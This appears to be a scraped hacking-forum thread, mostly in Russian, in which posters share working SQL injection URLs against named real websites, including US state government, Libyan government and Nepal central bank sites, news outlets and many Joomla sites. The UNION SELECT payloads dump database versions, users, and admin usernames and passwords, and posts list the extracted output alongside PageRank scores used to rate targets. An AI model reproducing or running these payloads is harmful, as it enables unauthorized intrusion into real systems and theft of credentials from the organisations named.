http://www.channel5belize.com/archive_detail_story.php?story_id=-19702+union+select+1,2,3,4,5,6,group_concat(username,char(58),password)+from+admin_login--+ PR-6 ------- http://www.mmegi.bw/index.php?sid=1&aid=1'+or(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+&dir=2008/October/Wednesday8 http://www.mmegi.bw/phpinfo.php )) PR-6
Code: http://www.ksda.[b]gov[/b]/open_records/id/1+or+1=(select+top+1+@@version+from+information_schema.tables)--+ Version: Microsoft SQL Server 2000 - 8.00.2055 Platform : Intel X86 OS: Windows NT 5.2 (Build 3790: Service Pack 2) PR — 6 Code: http://house.legis.state.la.us/H_Reps/members.asp?ID=-1+union+select+null,null,null,null,null,null,null,null,111,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+MSysAccessObjects Version: Access 1997 PR — 5
http://www.rockreport.be/review.asp?id=1414+union+select+1+--+ яндекс тиц 10 яндекс RANK 2/6 Google PageRank 4/10
Code: http://www.privacycorps.com/products/?id=-1+union+select+1,2,3,unhex(hex(concat_ws(char(58),version(),user(),database(),@@version_compile_os))),5,6,7,8,9,0,1,2,3--+ Version: 4.1.11-Debian_etch1-log User: [email protected] Database: privacycorps OS: pc-linux-gnu PR - 5 Code: http://www.panicandaction.com/artists.php?id=-1+union+select+1,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,0,1,2--+ Version: 5.0.41 User: [email protected] Database: panicandaction_com OS: pc-linux-gnu PR - 3 Code: http://www.mussonjamaica.com/about_web.php?id=-1'+union+select+1,concat_ws(char(58),version(),user(),database(),@@version_compile_os),3,4--+ Version: 5.0.45-community-nt User: pdbuser@localhost Database: mussonjamaica_webdb OS: Win32 PR - 4 Code: http://www.wingate.ru/products.php?todo=view&id=-1+union+select+1,2,3,concat_ws(char(58),version(),user(),database(),@@version_compile_os),5,6,7,8,9,0--+ Version: 5.0.45 User: anysoft1_wing@localhost Database: anysoft1_wing OS: redhat-linux-gnu тИЦ - 150 PR - 3 Code: http://dendymaster.ru/index.php?pages=catalog&id=-1+union+select+1,concat_ws(char(58),version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,0--+ Version: 4.1.25-log User: dendymas@localhost Database: wwwdendymasterru OS: portbld-freebsd6.2 тИЦ - 30 PR - 3
Калининград http://www.kaliningrad.yabloko.ru/news/index.phtml?id=-251+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+-- version : 5.0.51a-24+lenny4-log user : kaliningrad@localhost database : kaliningrad os : debian-linux-gnu
Code: http://www.adyashanti.org/index.php?file=writings_inner&writingid=-35+union+select+1,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5,6--+ Version: 5.0.91-community User: adyash2_ogs@localhost Database: adyash2_ogs OS: pc-linux-gnu PR - 4
sdelanovspb.ru PR-5 ТИЦ-30 Code: http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,4,5+--+ Code: 5.1.39-log:sdelanov@localhost:sdelanov ndl-global.com PR-5 ТИЦ-190 Code: http://ndl-global.com/print.php?news=-92+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,4,5+--+ Code: 5.0.88-log:[email protected]:ndlprofy_test
to nemaniak sdelanovspb.ru PR-5 ТИЦ-30 Code: http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,cast%28concat%28table_name,0x3a,column_name%29%20as%20binary%29,4,5+from+information_schema.columns+where+column_name+like+0x257061737325-- Итог: Code: http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,concat%28user_login,0x3a,user_pass%29,4,5+from+uw_users-- Траблы с админкой, две админки! ndl-global.com PR-5 ТИЦ-190 Code: http://ndl-global.com/print.php?news=-92+union+select+1,2,cast%28concat%28table_name,0x3a,column_name%29%20as%20binary%29,4,5+from+information_schema.columns+where+column_name+like+0x257061737325-- Итог: Code: http://ndl-global.com/print.php?news=-92+union+select+1,2,concat%28user_login,0x3a,user_pass%29,4,5+from+uw_users-- С админкой тоже самое, один и тотже сервак
Code: http://www.rosconcert.com/common/arc/story.php?id_cr=-56+UNION+SELECT+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%20from%20users--&id=19929 Username: [email protected] Version: 5.0.77 Database: cmn Google PR:4 Тиц: 350 Баян конечно, но чтото можно вытащить нужное. Code: http://www.fc-dynamospb.ru/list.php?id=-15+UNION+SELECT+1,2,3,cast%28concat%28table_name,0x3a,column_name%29%20as%20binary%29+from+information_schema.columns-- запрос к базе: from newusers_2 Joomla! 1.5 - Open Source Content Management Code: http://www.ijoomla.com/index.php?option=com_ijoomla_archive&act=getall&task=archive&ptitle=iJoomla%20Magazine§ionid=-4+UNION+SELECT+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29-- Username: ijoomla_udevxt@localhost Version: 5.0.91-community Database: ijoomla_dijooverx Google PR: 7
http://www.burs.org.bw/index.php?option=com_vat&id=-38+union+select+1,2,3,4,5,6,7,group_concat(username,char(58),password),9,10,11+from+jos_users
Центрального банка Непала Центрального банка Непала nrb.org.np Code: http://nrb.org.np/fxmexchangerate.php?YY=&&MM=&DD=-1'+union+select+1,2,concat_ws(0x3a3a,username,password,usertype),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+user_validate+limit+4,1+--+ http://nrb.org.np/login/login.php ..... Konqi : пассы нельзя выложить http://nrb.org.np/fxmexchangerate.php?YY=&&MM=&DD=-1'+union+select+1,2,concat_ws(0x3a3a,bank_code,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+lcuseraccounts+--+ ТИЦ: 50 PR: 6
Департамент труда и профессиональной подготовки Ливии MSSQL Code: http://www.smpt.[b]gov[/b].ly/ViewNews.aspx?id=-221+union+all+select+'1',username,'3',password,'5','6',null,'8','9'+from+users# PR - 5 пароли очень старательно придумывали
ТИЦ 80 PR 7 http://www.nativeweb.org/resources.php?type=1+union+select+1,2,concat_ws(0x3a, password,loginname),4,5, 6,7+from+users--
PR 3/10 ТИЦ 10 http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,version%28%29,User%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35 ,36,37,38+--+
https://stat.net.kht.ru/result/stat.pl?action=calc&stat_login=***'+order+by+1-- 'PostgreSQL 8.1.21 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.6:ViewUser:kray' Может у кого и не откроется т.к это сайт статистики компании Дальсвязь Я дальше копать не буду=) Завтра напишу им о ошибке т.к наследил в логах как слон(((
PR - 1 Code: http://realmebel63.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1 0,11+from+%23__users%23 Code: http://ulma-c.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1 0,11+from+%23__users%23 Code: http://www.euro-com.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1 0,11+from+%23__users%23 Code: http://cleanwin.org/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1 0,11+from+%23__users%23 Code: http://classtv.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1 0,11+from+%23__users%23 Code: http://www.sentimat.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1 0,11+from+%23__users%23 PR - 2 Code: http://alvitek.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1 0,11+from+%23__users%23 PR - 3 Code: http://gsdk9.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1 0,11+from+%23__users%23 Code: http://www.medvedi-pc.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1 0,11+from+%23__users%23
ТИЦ10YC(R2) PR3 ТИЦ10(R2) ТИЦ 200 PR1 ТИЦ10(R2) PR1 PR1 PR3 PR2 PR2 ТИЦ30(R3) PR3 AR9439063 ТИЦ10(R2) PR4 PR2 ТИЦ10(R2) PR2 AR19886775
